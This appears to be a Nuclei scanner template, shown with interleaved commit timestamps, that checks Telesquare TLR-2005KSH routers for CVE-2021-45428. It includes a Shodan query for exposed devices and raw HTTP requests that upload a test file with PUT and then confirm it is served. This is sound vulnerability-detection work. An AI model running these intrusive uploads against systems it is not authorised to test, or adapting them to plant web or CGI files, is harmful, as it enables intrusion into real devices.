2022-05-18 23:38:13 +00:00
id : CVE-2021-45428
info :
name : Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Upload
author : gy741
severity : critical
2022-05-19 19:14:47 +00:00
description : |
TLR-2005KSH is affected by an incorrect access control vulnerability. THe PUT method is enabled so an attacker can upload arbitrary files including HTML and CGI formats.
2022-05-18 23:38:13 +00:00
reference :
- https://drive.google.com/file/d/1wM1SPOfB9mH2SES7cAmlysuI9fOpFB3F/view?usp=sharing
- http://packetstormsecurity.com/files/167101/TLR-2005KSH-Arbitrary-File-Upload.html
2022-05-19 19:14:47 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-45428
2022-05-18 23:38:13 +00:00
classification :
2022-05-19 19:35:49 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-05-18 23:38:13 +00:00
cvss-score : 9.8
cve-id : CVE-2021-45428
cwe-id : CWE-639
2023-04-12 10:55:48 +00:00
epss-score : 0.06433
2022-05-18 23:38:13 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 3
2022-05-18 23:38:13 +00:00
shodan-query : http.html:"TLR-2005KSH"
2023-06-04 08:13:42 +00:00
verified : true
2022-08-27 04:41:18 +00:00
tags : cve,cve2021,telesquare,intrusive,fileupload,packetstorm
2022-05-18 23:38:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-05-18 23:38:13 +00:00
- raw :
- |
2022-05-19 19:14:47 +00:00
GET /{{randstr}}.txt HTTP/1.1
2022-05-18 23:38:13 +00:00
Host : {{Hostname}}
- |
2022-05-19 19:14:47 +00:00
PUT /{{randstr}}.txt HTTP/1.1
2022-05-18 23:38:13 +00:00
Host : {{Hostname}}
2022-05-19 19:14:47 +00:00
CVE-2021-45428
2022-05-18 23:38:13 +00:00
- |
2022-05-19 19:14:47 +00:00
GET /{{randstr}}.txt HTTP/1.1
2022-05-18 23:38:13 +00:00
Host : {{Hostname}}
req-condition : true
matchers-condition : and
matchers :
- type : dsl
dsl :
2022-05-19 19:14:47 +00:00
- 'status_code_1 == 404 && status_code_2 == 201'
- 'contains(body_3, "CVE-2021-45428") && status_code_3 == 200'
condition : and
2022-05-18 23:38:13 +00:00
# Enhanced by mp on 2022/05/19